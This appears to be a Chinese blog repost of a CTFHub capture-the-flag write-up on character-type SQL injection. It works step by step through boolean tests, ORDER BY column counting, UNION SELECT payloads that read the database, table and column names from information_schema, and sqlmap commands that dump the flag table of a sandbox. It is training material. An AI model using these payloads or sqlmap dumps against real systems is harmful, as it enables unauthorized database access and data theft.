当前位置: 首页 > article >正文

CTFHUB技能树之SQL——字符型注入

article 2024/10/23 1:43:01

开启靶场,打开链接:

直接指明是SQL字符型注入,但还是来判断一下

(1)检查是否存在注入点

1' and 1=1#

返回正确

1' and 1=2#

返回错误

说明存在SQL字符型注入

(2)猜字段数

1' order by 2#

1' order by 3#

说明字段数是2

(3)爆数据库名

1' and 1=2 union select 1,database()#

得知数据库名是sqli

(4)爆表名

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表,其中flag表是我们需要的

(5)爆列名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

得知flag表的列名是flag

(6)爆字段内容(flag)

1' and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功得到flag:

ctfhub{ee5bfa3b423eb2d6142c66b9}

接下来就用一下sqlmap来试一下:

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

一样成功得到flag


http://www.kler.cn/news/360924.html

相关文章:

  • 【NestJS入门到精通】装饰器
  • 【无标题】海尔AI英语面试
  • AIGC时代算法工程师的面试秘籍(第二十四式2024.9.30-10.20) |【三年面试五年模拟】
  • windows 导出 oracle DMP文件
  • 【英特尔IA-32架构软件开发者开发手册第3卷:系统编程指南】2001年版翻译,2-2
  • Kadane 算法
  • 【含开题报告+文档+PPT+源码】基于springboot的旅游路线推荐系统的设计与实现
  • 开发自定义大模型
  • 力扣 56.合并区间——Java
  • 让你的 IDEA 使用更流畅 | IDEA内存修改
  • 【GIT】.cr、.gitattributes 、 .gitignore和.git各文件夹讲解介绍
  • 使用milvus数据库实现文本相似比较
  • 打造高性能在线电子表格:WebGL 渲染引擎 Kola2d 自研之路
  • Linux·文件与IO
  • 【Vue】Vue(八)Vue3.0 使用ref 和 reactive创建响应式数据
  • 【linux】线程 (三)
  • Linux系统基础-进程间通信(3)_模拟实现匿名管道
  • 曝iPhone 18 Pro Max首发2nm芯片:内存升级12GB
  • leetcode 刷题day44动态规划Part13( 647. 回文子串、516.最长回文子序列)
  • Kubescape 扫描和修复容器镜像漏洞